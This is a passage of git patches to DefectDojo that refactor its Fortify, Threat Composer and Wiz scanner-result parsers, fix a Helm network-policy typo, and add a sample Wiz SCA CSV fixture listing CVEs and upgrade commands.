vuln.find(f"{namespace}ClassInfo").find(f"{namespace}Kingdom").text - Type = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}Type").text - AnalyzerName = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}AnalyzerName").text - DefaultSeverity = vuln.find(f"{namespace}ClassInfo").find(f"{namespace}DefaultSeverity").text - InstanceID = vuln.find(f"{namespace}InstanceInfo").find(f"{namespace}InstanceID").text - InstanceSeverity = vuln.find(f"{namespace}InstanceInfo").find(f"{namespace}InstanceSeverity").text - Confidence = vuln.find(f"{namespace}InstanceInfo").find(f"{namespace}Confidence").text - SourceLocationpath = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("path") - SourceLocationline = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("line") - SourceLocationlineEnd = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("lineEnd") - SourceLocationcolStart = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("colStart") - SourceLocationcolEnd = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("colEnd") - SourceLocationsnippet = vuln.find(f"{namespace}AnalysisInfo").find(f"{namespace}Unified").find(f"{namespace}Trace").find(f"{namespace}Primary").find(f"{namespace}Entry").find(f"{namespace}Node").find(f"{namespace}SourceLocation").attrib.get("snippet") - description = Type + "\n" - severity = self.fpr_severity(Confidence, InstanceSeverity) - description += "**ClassID:** " + ClassID + "\n" - description += "**Kingdom:** " + Kingdom + "\n" - description += "**AnalyzerName:** " + AnalyzerName + "\n" - description += "**DefaultSeverity:** " + DefaultSeverity + "\n" - description += "**InstanceID:** " + InstanceID + "\n" - description += "**InstanceSeverity:** " + InstanceSeverity + "\n" - description += "**Confidence:** " + Confidence + "\n" - description += "**SourceLocationpath:** " + str(SourceLocationpath) + "\n" - description += "**SourceLocationline:** " + str(SourceLocationline) + "\n" - description += "**SourceLocationlineEnd:** " + str(SourceLocationlineEnd) + "\n" - description += "**SourceLocationcolStart:** " + str(SourceLocationcolStart) + "\n" - description += "**SourceLocationcolEnd:** " + str(SourceLocationcolEnd) + "\n" - description += "**SourceLocationsnippet:** " + str(SourceLocationsnippet) + "\n" - items.append( - Finding( - title=Type + " " + ClassID, - severity=severity, - static_finding=True, - test=test, - description=description, - unique_id_from_tool=ClassID, - file_path=SourceLocationpath, - line=SourceLocationline, - ), - ) + finding_context = { + "title": "", + "description": "", + "static_finding": True, + "test": test, + } + self.parse_class_information(vuln, finding_context) + self.parse_instance_information(vuln, finding_context) + self.parse_analysis_information(vuln, finding_context) + self.parse_severity_and_convert(vuln, finding_context) + items.append(Finding(**finding_context)) return items - def fpr_severity(self, Confidence, InstanceSeverity): - if float(Confidence) >= 2.5 and float(InstanceSeverity) >= 2.5: - severity = "Critical" - elif float(Confidence) >= 2.5 and float(InstanceSeverity) < 2.5: - severity = "High" - elif float(Confidence) < 2.5 and float(InstanceSeverity) >= 2.5: - severity = "Medium" - elif float(Confidence) < 2.5 and float(InstanceSeverity) < 2.5: - severity = "Low" - else: - severity = "Info" - return severity + def parse_severity_and_convert(self, vulnerability: Element, finding_context: dict) -> None: + """Convert the the float representation of severity and confidence to a string severity.""" + # Default info severity in the case of an error + severity = "Info" + instance_severity = None + confidence = None + # Attempt to fetch the confidence and instance severity + if (instance_info := vulnerability.find(f"{self.namespace}InstanceInfo")) is not None: + instance_severity = getattr(instance_info.find(f"{self.namespace}InstanceSeverity"), "text", None) + confidence = getattr(instance_info.find(f"{self.namespace}Confidence"), "text", None) + # Make sure we have something to work with + if confidence is not None and instance_severity is not None: + if float(confidence) >= 2.5 and float(instance_severity) >= 2.5: + severity = "Critical" + elif float(confidence) >= 2.5 and float(instance_severity) < 2.5: + severity = "High" + elif float(confidence) < 2.5 and float(instance_severity) >= 2.5: + severity = "Medium" + elif float(confidence) < 2.5 and float(instance_severity) < 2.5: + severity = "Low" + # Return either info, or the calculated severity + finding_context["severity"] = severity + + def parse_class_information(self, vulnerability: Element, finding_context: dict) -> None: + """Appends the description with any class information that can be extracted.""" + if (class_info := vulnerability.find(f"{self.namespace}ClassInfo")) is not None: + if (namespace_type := class_info.find(f"{self.namespace}Type")) is not None: + finding_context["description"] += f"{namespace_type.text}\n" + finding_context["title"] += f"{namespace_type.text}" + if (class_id := class_info.find(f"{self.namespace}ClassID")) is not None: + finding_context["description"] += f"**ClassID:** {class_id.text}\n" + finding_context["unique_id_from_tool"] = class_id.text + finding_context["title"] += f" {class_id.text}" + if (kingdom := class_info.find(f"{self.namespace}Kingdom")) is not None: + finding_context["description"] += f"**Kingdom:** {kingdom.text}\n" + if (analyzer_name := class_info.find(f"{self.namespace}AnalyzerName")) is not None: + finding_context["description"] += f"**AnalyzerName:** {analyzer_name.text}\n" + if (default_severity := class_info.find(f"{self.namespace}DefaultSeverity")) is not None: + finding_context["description"] += f"**DefaultSeverity:** {default_severity.text}\n" + + def parse_instance_information(self, vulnerability: Element, finding_context: dict) -> None: + """Appends the description with any instance information that can be extracted.""" + if (instance_info := vulnerability.find(f"{self.namespace}InstanceInfo")) is not None: + if (instance_id := instance_info.find(f"{self.namespace}InstanceID")) is not None: + finding_context["description"] += f"**InstanceID:** {instance_id.text}\n" + if (instance_severity := instance_info.find(f"{self.namespace}InstanceSeverity")) is not None: + finding_context["description"] += f"**InstanceSeverity:** {instance_severity.text}\n" + if (confidence := instance_info.find(f"{self.namespace}Confidence")) is not None: + finding_context["description"] += f"**Confidence:** {confidence.text}\n" + + def parse_analysis_information(self, vulnerability: Element, finding_context: dict) -> None: + """Appends the description with any analysis information that can be extracted.""" + if (analysis_info := vulnerability.find(f"{self.namespace}AnalysisInfo")) is not None: + # See if we can get a SourceLocation from this + if (source_location := self.get_source_location(analysis_info)) is not None: + path = source_location.attrib.get("path") + line = source_location.attrib.get("line") + # Managed the description + finding_context["description"] += f"**SourceLocationPath:** {path}\n" + finding_context["description"] += f"**SourceLocationLine:** {line}\n" + finding_context["description"] += ( + f"**SourceLocationLineEnd:** {source_location.attrib.get('lineEnd')}\n" + ) + finding_context["description"] += ( + f"**SourceLocationColStart:** {source_location.attrib.get('colStart')}\n" + ) + finding_context["description"] += f"**SourceLocationColEnd:** {source_location.attrib.get('colEnd')}\n" + finding_context["description"] += ( + f"**SourceLocationSnippet:** {source_location.attrib.get('snippet')}\n" + ) + # manage the other metadata + finding_context["file_path"] = path + finding_context["line"] = line + + def get_source_location(self, analysis_info: Element) -> Element | None: + """Return the SourceLocation element if we are able to reach it.""" + # The order of this list is very important. Do not reorder it! + key_path = [ + "Unified", + "Trace", + "Primary", + "Entry", + "Node", + "SourceLocation", + ] + # iterate of the keys until we find something that cannot be fulfilled + current_element = analysis_info + # Traverse the key path up to "Entry" to fetch all Entry elements + for key in key_path[:-3]: # stop before "Entry" level + if (next_current_element := current_element.find(f"{self.namespace}{key}")) is not None: + current_element = next_current_element + else: + return None + # Iterate over all "Entry" elements + entries = current_element.findall(f"{self.namespace}Entry") + for entry in entries: + # Continue the search for "Node" and "SourceLocation" within each entry + if (node := entry.find(f"{self.namespace}Node")) is not None: + if (source_location := node.find(f"{self.namespace}SourceLocation")) is not None: + return source_location + # Return None if no SourceLocation was found in any Entry + return None diff --git a/dojo/tools/fortify/parser.py b/dojo/tools/fortify/parser.py index 2b1f3e21e3d..b6f7e5185c8 100644 --- a/dojo/tools/fortify/parser.py +++ b/dojo/tools/fortify/parser.py @@ -17,3 +17,6 @@ def get_findings(self, filename, test): return FortifyXMLParser().parse_xml(filename, test) elif str(filename.name).endswith(".fpr"): return FortifyFPRParser().parse_fpr(filename, test) + else: + msg = "Filename extension not recognized. Use .xml or .fpr" + raise ValueError(msg) From 5b25e16cf9bc9d7a027906432370089230f2a273 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81ngel=20Riveira?= <61965217+arivra@users.noreply.github.com> Date: Mon, 16 Sep 2024 04:24:36 +0200 Subject: [PATCH 06/12] manage not defined metadata in mitigations and add assumptions comments (#10897) --- dojo/tools/threat_composer/parser.py | 21 +++++++++++++------ .../threat_composer_many_threats.json | 9 ++------ 2 files changed, 17 insertions(+), 13 deletions(-) diff --git a/dojo/tools/threat_composer/parser.py b/dojo/tools/threat_composer/parser.py index 1babba06fd2..f1099641b07 100644 --- a/dojo/tools/threat_composer/parser.py +++ b/dojo/tools/threat_composer/parser.py @@ -70,12 +70,12 @@ def get_findings(self, file, test): if "threatAction" in threat: title = threat["threatAction"] - severity, impact, comments = self.parse_threat_metadata(threat["metadata"]) + severity, impact, comments = self.parse_threat_metadata(threat.get("metadata", [])) description = self.to_description_text(threat, comments, assumption_threat_links[threat["id"]]) mitigation = self.to_mitigation_text(mitigation_links[threat["id"]]) unique_id_from_tool = threat["id"] vuln_id_from_tool = threat["numericId"] - tags = threat["tags"] if "tags" in threat else [] + tags = threat.get("tags", []) finding = Finding( title=title, @@ -112,14 +112,12 @@ def to_mitigation_text(self, mitigations): counti = i + 1 text += f"**Mitigation {counti} (ID: {mitigation['numericId']}, Status: {mitigation.get('status', 'Not defined')})**: {mitigation['content']}" - for item in mitigation["metadata"]: + for item in mitigation.get("metadata", []): if item["key"] == "Comments": text += f"\n*Comments*: {item['value'].replace(linesep, ' ')} " break - for j, assumption in enumerate(assumption_links): - countj = j + 1 - text += f"\n- *Assumption {countj} (ID: {assumption['numericId']})*: {assumption['content'].replace(linesep, ' ')}" + text += self.to_assumption_text(assumption_links) text += "\n" @@ -145,8 +143,19 @@ def to_description_text(self, threat, comments, assumption_links): if comments: text += f"\n*Comments*: {comments}" + text += self.to_assumption_text(assumption_links) + + return text + + def to_assumption_text(self, assumption_links): + text = "" for i, assumption in enumerate(assumption_links): counti = i + 1 text += f"\n- *Assumption {counti} (ID: {assumption['numericId']})*: {assumption['content'].replace(linesep, ' ')}" + for item in assumption.get("metadata", []): + if item["key"] == "Comments": + text += f"\n  *Comments*: {item['value'].replace(linesep, ' ')} " + break + return text diff --git a/unittests/scans/threat_composer/threat_composer_many_threats.json b/unittests/scans/threat_composer/threat_composer_many_threats.json index cb61d880bde..6af441362e3 100644 --- a/unittests/scans/threat_composer/threat_composer_many_threats.json +++ b/unittests/scans/threat_composer/threat_composer_many_threats.json @@ -94,13 +94,8 @@ "tags": [ "lorem ipsum" ], - "metadata": [ - { - "key": "Comments", - "value": "lorem ipsum" - } - ], - "displayOrder": 21 + "displayOrder": 21, + "status": "mitigationResolved" }, { "id": "11fb1c71-42f0-4004-89a7-09d8bf6f8b11", From e9824dca5f6d05cc4cf249cda9219d0b29f083b8 Mon Sep 17 00:00:00 2001 From: Vladimir Shelkovnikov <99356504+C4tWithShell@users.noreply.github.com> Date: Mon, 16 Sep 2024 05:25:02 +0300 Subject: [PATCH 07/12] Fix typo in ingress policy (#10898) --- helm/defectdojo/templates/network-policy.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helm/defectdojo/templates/network-policy.yaml b/helm/defectdojo/templates/network-policy.yaml index 251128004e9..80c55ddcfa3 100644 --- a/helm/defectdojo/templates/network-policy.yaml +++ b/helm/defectdojo/templates/network-policy.yaml @@ -13,7 +13,7 @@ spec: podSelector: matchLabels: app.kubernetes.io/instance: {{ .Release.Name }} - {{- if .Value.networkPolicy.ingress}} + {{- if .Values.networkPolicy.ingress}} ingress: {{- toYaml .Values.networkPolicy.ingress | nindent 4 }} {{- else }} From 0da81c6091b512052f0358d91ac33803cf755624 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 21:39:35 -0500 Subject: [PATCH 08/12] Wiz Parser: Add SCA parser and fortify old format (#10905) * Wiz Parser: Add SCA parser and fortify old format * Adding unit tests * Fix ruff --- dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 2 +- dojo/tools/wiz/parser.py | 256 ++++++++++++++++------ unittests/scans/wiz/sca_format.csv | 6 + unittests/tools/test_wiz_parser.py | 60 ++++- 5 files changed, 254 insertions(+), 72 deletions(-) create mode 100644 unittests/scans/wiz/sca_format.csv diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index b6e48ee437c..38c8e498527 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -1a74292fc58b2bd05c763c8c126b0b35888e2a6f8ef9ab2588bb6c8589987c9c +702d74c8bc703d11c03cf5b3f7c4319ad0cdeaef68db6426d1112c59e59365a6 diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index 41f0631fa43..bd33f7fed8a 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -1496,7 +1496,7 @@ def saml2_attrib_map_format(dict): "OSV Scan": DEDUPE_ALGO_HASH_CODE, "Nosey Parker Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE, "Bearer CLI": DEDUPE_ALGO_HASH_CODE, - "Wiz Scan": DEDUPE_ALGO_HASH_CODE, + "Wiz Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE, "Deepfence Threatmapper Report": DEDUPE_ALGO_HASH_CODE, "Kubescape JSON Importer": DEDUPE_ALGO_HASH_CODE, "Kiuwan SCA Scan": DEDUPE_ALGO_HASH_CODE, diff --git a/dojo/tools/wiz/parser.py b/dojo/tools/wiz/parser.py index a68ecae2bbe..f3125544748 100644 --- a/dojo/tools/wiz/parser.py +++ b/dojo/tools/wiz/parser.py @@ -1,91 +1,209 @@ import csv import io +import json +import logging import sys -from dojo.models import Finding +from dateutil import parser as date_parser +from dojo.models import SEVERITIES, Finding, Test -class WizParser: - def get_scan_types(self): - return ["Wiz Scan"] +logger = logging.getLogger(__name__) - def get_label_for_scan_types(self, scan_type): - return "Wiz Scan" - def get_description_for_scan_types(self, scan_type): - return "Wiz scan results in csv file format." +class WizParserByTitle: + """Parser the CSV where the "Title" field is the match for a finding title.""" - def get_findings(self, filename, test): - content = filename.read() - if isinstance(content, bytes): - content = content.decode("utf-8") - csv.field_size_limit(int(sys.maxsize / 10)) # the request/resp are big - reader = csv.DictReader(io.StringIO(content)) + def parse_findings(self, test: Test, reader: csv.DictReader) -> list[Finding]: + """Parse the CSV with the assumed format of the link below. + + test file: https://github.com/DefectDojo/django-DefectDojo/blob/master/unittests/scans/wiz/multiple_findings.csv + """ findings = [] + description_fields = [ + "Description", + "Resource Type", + "Resource external ID", + "Subscription ID", + "Project IDs", + "Project Names", + "Control ID", + "Resource Name", + "Resource Region", + "Resource Status", + "Resource Platform", + "Resource OS", + "Resource original JSON", + "Issue ID", + "Resource vertex ID", + "Ticket URLs", + "Note", + "Due At", + "Subscription Name", + "Wiz URL", + "Cloud Provider URL", + "Resource Tags", + "Kubernetes Cluster", + "Kubernetes Namespace", + "Container Service", + ] + # Iterate over the objects to create findings for row in reader: if row.get("Status").lower() == "open": - Title = row.get("Title") - Severity = row.get("Severity") - Description = row.get("Description") - Resource_Type = row.get("Resource Type") - Resource_external_ID = row.get("Resource external ID") - Subscription_ID = row.get("Subscription ID") - Project_IDs = row.get("Project IDs") - Project_Names = row.get("Project Names") - Control_ID = row.get("Control ID") - Resource_Name = row.get("Resource Name") - Resource_Region = row.get("Resource Region") - Resource_Status = row.get("Resource Status") - Resource_Platform = row.get("Resource Platform") - Resource_OS = row.get("Resource OS") - Resource_original_JSON = row.get("Resource original JSON") - Issue_ID = row.get("Issue ID") - Resource_vertex_ID = row.get("Resource vertex ID") - Ticket_URLs = row.get("Ticket URLs") - Note = row.get("Note") - Due_At = row.get("Due At") - Subscription_Name = row.get("Subscription Name") - Wiz_URL = row.get("Wiz URL") - Cloud_Provider_URL = row.get("Cloud Provider URL") - Resource_Tags = row.get("Resource Tags") - Kubernetes_Cluster = row.get("Kubernetes Cluster") - Kubernetes_Namespace = row.get("Kubernetes Namespace") - Container_Service = row.get("Container Service") + title = row.get("Title") + severity = row.get("Severity") + mitigation = row.get("Remediation Recommendation") description = "" - description += "**Description**: " + Description + "\n" - description += "**Resource Type**: " + Resource_Type + "\n" - description += "**external ID**: " + Resource_external_ID + "\n" - description += "**Subscription ID**: " + Subscription_ID + "\n" - description += "**Project IDs**: " + Project_IDs + "\n" - description += "**Project Names**: " + Project_Names + "\n" - description += "**Control ID**: " + Control_ID + "\n" - description += "**Resource Name**: " + Resource_Name + "\n" - description += "**Resource Region**: " + Resource_Region + "\n" - description += "**Resource Status**: " + Resource_Status + "\n" - description += "**Resource Platform**: " + Resource_Platform + "\n" - description += "**Resource OS**: " + Resource_OS + "\n" - description += "**original JSON**: " + Resource_original_JSON + "\n" - description += "**Issue ID**: " + Issue_ID + "\n" - description += "**vertex ID**: " + Resource_vertex_ID + "\n" - description += "**Ticket URLs**: " + Ticket_URLs + "\n" - description += "**Note**: " + Note + "\n" - description += "**Due At**: " + Due_At + "\n" - description += "**Subscription Name**: " + Subscription_Name + "\n" - description += "**Wiz URL**: " + Wiz_URL + "\n" - description += "**Provider URL**: " + Cloud_Provider_URL + "\n" - description += "**Resource Tags**: " + Resource_Tags + "\n" - description += "**Kubernetes Cluster**: " + Kubernetes_Cluster + "\n" - description += "**Kubernetes Namespace**: " + Kubernetes_Namespace + "\n" - description += "**Container Service**: " + Container_Service + "\n" + # Iterate over the description fields to create the description + for field in description_fields: + if (field_value := row.get(field)) is not None and len(field_value) > 0: + description += f"**{field}**: {field_value}\n" + # Create the finding object findings.append( Finding( - title=Title, + title=title, description=description, - severity=Severity.lower().capitalize(), + severity=severity.lower().capitalize(), static_finding=False, dynamic_finding=True, - mitigation=row.get("Remediation Recommendation"), + mitigation=mitigation, test=test, ), ) return findings + + +class WizParserByDetailedName: + """Parser the CSV where the "DetailedName" and "Name" fields are the match for a finding title.""" + + def parse_findings(self, test: Test, reader: csv.DictReader) -> list[Finding]: + """Parse the CSV with the assumed format of the link below. + + test file: Coming soon! + """ + findings = [] + description_fields = { + "WizURL": "Wiz URL", + "HasExploit": "Has Exploit", + "HasCisaKevExploit": "Has Cisa Kev Exploit", + "LocationPath": "Location Path", + "Version": "Version", + "DetectionMethod": "Detection Method", + "Link": "Link", + "Projects": "Projects", + "AssetID": "Asset ID", + "AssetName": "Asset Name", + "AssetRegion": "Asset Region", + "ProviderUniqueId": "Provider Unique Id", + "CloudProviderURL": "Cloud Provider URL", + "CloudPlatform": "Cloud Platform", + "SubscriptionExternalId": "Subscription External Id", + "SubscriptionId": "Subscription Id", + "SubscriptionName": "Subscription Name", + "ExecutionControllers": "Execution Controllers", + "ExecutionControllersSubscriptionExternalIds": "Execution Controllers Subscription External Ids", + "ExecutionControllersSubscriptionNames": "Execution Controllers Subscription Names", + "OperatingSystem": "Operating System", + "IpAddresses": "Ip Addresses", + } + mitigation_fields = { + "LocationPath": "Location Path", + "FixedVersion": "Fixed Version", + "Remediation": "Remediation", + } + + for row in reader: + # Common fields + vulnerability_id = row.get("Name") + package_name = row.get("DetailedName") + package_version = row.get("Version") + severity = row.get("VendorSeverity") + finding_id = row.get("ID") + + description = self._construct_string_field(description_fields, row) + mitigation = self._construct_string_field(mitigation_fields, row) + status_dict = self._convert_status(row) + # Create the finding object + finding = Finding( + title=f"{package_name}: {vulnerability_id}", + description=description, + mitigation=mitigation, + severity=self._validate_severities(severity), + static_finding=True, + unique_id_from_tool=finding_id, + component_name=package_name, + component_version=package_version, + date=date_parser.parse(row.get("FirstDetected")), + test=test, + **status_dict, + ) + finding.unsaved_vulnerability_ids = [vulnerability_id] + finding.unsaved_tags = self._parse_tags(row.get("Tags", "[]")) + findings.append(finding) + return findings + + def _construct_string_field(self, fields: dict[str, str], row: dict) -> str: + """Construct a formatted string based on the fields dict supplied.""" + return_string = "" + for field, pretty_field in fields.items(): + if (field_value := row.get(field)) is not None and len(field_value) > 0: + return_string += f"**{pretty_field}**: `{field_value}`\n" + return return_string + + def _parse_tags(self, tags: str) -> list[str]: + """parse the Tag string dict, and convert to a list of strings. + + The format of the tags is is "{""key"":""value""}" format + """ + # Convert the string to a dict + tag_dict = json.loads(tags) + return [f"{key}: {value}" for key, value in tag_dict.items()] + + def _validate_severities(self, severity: str) -> str: + """Ensure the supplied severity fits what DefectDojo is expecting.""" + if severity not in SEVERITIES: + logger.error(f"Severity is not supported: {severity}") + # Default to Info severity + return "Info" + return severity + + def _convert_status(self, row: dict) -> dict: + """Convert the "FindingStatus" column to a dict of Finding statuses. + + - Open-> Active = True + - Other statuses that may exist... + """ + if (status := row.get("FindingStatus")) is not None: + if status == "Open": + return {"active": True} + # Return the default status of active + return {"active": True} + + +class WizParser( + WizParserByTitle, + WizParserByDetailedName, +): + def get_scan_types(self): + return ["Wiz Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Wiz Scan" + + def get_description_for_scan_types(self, scan_type): + return "Wiz scan results in csv file format." + + def get_findings(self, filename, test): + content = filename.read() + if isinstance(content, bytes): + content = content.decode("utf-8") + csv.field_size_limit(int(sys.maxsize / 10)) # the request/resp are big + reader = csv.DictReader(io.StringIO(content)) + # Determine which parser to use + if "Title" in reader.fieldnames: + return WizParserByTitle().parse_findings(test, reader) + if all(field in reader.fieldnames for field in ["Name", "DetailedName"]): + return WizParserByDetailedName().parse_findings(test, reader) + else: + msg = "This CSV format of Wiz is not supported" + raise ValueError(msg) diff --git a/unittests/scans/wiz/sca_format.csv b/unittests/scans/wiz/sca_format.csv new file mode 100644 index 00000000000..c77dd7ea799 --- /dev/null +++ b/unittests/scans/wiz/sca_format.csv @@ -0,0 +1,6 @@ +ID,WizURL,Name,CVSSSeverity,HasExploit,HasCisaKevExploit,FindingStatus,VendorSeverity,FirstDetected,LastDetected,ResolvedAt,ResolutionReason,Remediation,LocationPath,DetailedName,Version,FixedVersion,DetectionMethod,Link,Projects,AssetID,AssetName,AssetRegion,ProviderUniqueId,CloudProviderURL,CloudPlatform,Status,SubscriptionExternalId,SubscriptionId,SubscriptionName,Tags,ExecutionControllers,ExecutionControllersSubscriptionExternalIds,ExecutionControllersSubscriptionNames,CriticalRelatedIssuesCount,HighRelatedIssuesCount,MediumRelatedIssuesCount,LowRelatedIssuesCount,InfoRelatedIssuesCount,OperatingSystem,IpAddresses +3ea99668-721f-11ef-94e9-bb8aaa280b32,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea99668-721f-11ef-94e9-bb8aaa280b32*2cSECURITY_TOOL_FINDING)),CVE-2024-39474,Low,false,false,Open,Low,2024-08-28T03:02:01Z,2024-08-07T12:27:01Z,,,go get -u github.com/containerd/containerd,/home/kubernetes/bin/containerd-gcfs-grpc,github.com/containerd/containerd,1.4.0,1.5.11,Library,https://github.com/advisories/GHSA-c9cp-9c75-9v8c,MyProject; Ops_k8s,a2ca5de0-7223-11ef-af4c-032d5da2afbf,k8s-bigcorp-default-zone-0dd0efbc-46n6,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.6 +3ea9e0fa-721f-11ef-9fd4-c3ec645f4a2e,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea9e0fa-721f-11ef-9fd4-c3ec645f4a2e*2cSECURITY_TOOL_FINDING)),CVE-2024-36891,Medium,false,false,Open,Medium,2024-08-28T03:02:01Z,2024-08-07T12:27:11Z,,,go get -u k8s.io/apimachinery,/home/kubernetes/bin/log-counter,k8s.io/apimachinery,0.17.2,0.17.9,Library,https://github.com/advisories/GHSA-33c5-9fx5-fvjm,MyProject; Ops_k8s,d44b822c-7223-11ef-abf8-d719c8dbc602,k8s-bigcorp-default-zone-a0930315-p21b,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-c/instances/k8s-bigcorp-default-zone-a0930315-p21b,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-c/instances/k8s-bigcorp-default-zone-a0930315-p21b?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.15 +3eaa0422-721f-11ef-b00a-c772bc38a673,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3eaa0422-721f-11ef-b00a-c772bc38a673*2cSECURITY_TOOL_FINDING)),GHSA-c9cp-9c75-9v8c,Medium,false,false,Open,Medium,2024-08-28T05:52:53Z,2024-08-07T12:27:01Z,,,,,kernel,109.17800.218.33,109.17800.218.88,OS,https://cloud.google.com/container-optimized-os/docs/release-notes/m109#cos-109-17800-218-88_,MyProject; Ops_k8s,a2ca5de0-7223-11ef-af4c-032d5da2afbf,k8s-bigcorp-default-zone-0dd0efbc-46n6,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-f/instances/k8s-bigcorp-default-zone-0dd0efbc-46n6?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.6 +3ea965b2-721f-11ef-8a61-83124251d18e,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea965b2-721f-11ef-8a61-83124251d18e*2cSECURITY_TOOL_FINDING)),CVE-2020-8559,Medium,false,false,Open,Medium,2024-08-28T03:02:01Z,2024-08-07T12:28:33Z,,,,,kernel,109.17800.218.33,109.17800.218.83,OS,https://cloud.google.com/container-optimized-os/docs/release-notes/m109#cos-109-17800-218-83_,MyProject; Ops_k8s,045832bc-7224-11ef-baf5-2fe1c91669e7,k8s-bigcorp-default-zone-2a743c24-8wcy,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.233 +3ea9bdfa-721f-11ef-8722-2fdfd8ca32bc,https://app.wiz.io/explorer/vulnerability-findings#~(entity~(~'3ea9bdfa-721f-11ef-8722-2fdfd8ca32bc*2cSECURITY_TOOL_FINDING)),CVE-2024-36891,Medium,false,false,Open,Medium,2024-08-28T03:02:01Z,2024-08-07T12:28:33Z,,,,,kernel,109.17800.218.33,109.17800.218.88,OS,https://cloud.google.com/container-optimized-os/docs/release-notes/m109#cos-109-17800-218-88_,MyProject; Ops_k8s,045832bc-7224-11ef-baf5-2fe1c91669e7,k8s-bigcorp-default-zone-2a743c24-8wcy,us-central1,https://www.googleapis.com/compute/v1/projects/big-corp/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy,https://console.cloud.google.com/compute/instancesDetail/zones/us-central1-b/instances/k8s-bigcorp-default-zone-2a743c24-8wcy?project=MyProject,GCP,Active,Big-Corp,11edc986-d649-500f-ae57-01eb6e2e42d8,Big-Corp,"{""k8s-myproject-public-117f7861-node"":""k8s-myproject-public-117f7861-node"",""goog-k8s-cost-mgnt"":"""",""goog-gke-node"":"""",""goog-k8s-cluster-location"":""us-central1"",""goog-k8s-cluster-name"":""myproject-public"",""goog-k8s-node-pool-name"":""default-pool""}",[],,,0,0,0,0,0,Linux,10.110.208.233 diff --git a/unittests/tools/test_wiz_parser.py b/unittests/tools/test_wiz_parser.py index 9d72c594126..a2d3975e4e9 100644 --- a/unittests/tools/test_wiz_parser.py 